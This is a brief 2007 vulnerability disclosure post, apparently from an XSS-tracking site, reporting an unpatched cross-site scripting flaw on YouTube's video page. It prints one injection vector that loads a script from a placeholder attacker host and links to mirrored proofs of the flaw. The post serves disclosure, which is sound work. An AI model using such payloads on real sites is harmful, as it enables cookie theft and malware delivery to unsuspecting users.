YouTube XSS celebrates one month of age

Written by Dimitris Pagkalos

Thursday, 6 December 2007

YouTube is currently number 4 of the most visited websites on the planet according to Alexa. With more than 100 million video views every day, visitors are at great risk due to a serious cross-site scripting vulnerability, from which YouTube suffers for a month already. It is a query string XSS  that appears in the video viewing page. Works only with IE and probably Konqueror. Malicious people can use it to spread malware, steal cookie based authentication credentials and redirect unaware users to phishing scam pages.

The following vector works successfully:
"><script/src=http://attacker/malware.js>

Mirrors of YouTube XSS vulnerabilities:
http://www.xssed.com/mirror/25330/  - Working since 07/11/07
http://www.xssed.com/mirror/7109/  - Fixed
http://www.xssed.com/mirror/5681/  - Fixed
http://www.xssed.com/mirror/197/  - Fixed

Please YouTube resolve this issue! I do not want malicious people to steal the cookies of my grandmother watching "The Joy of Painting" by Bob Ross! :)



Share this content:
        
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.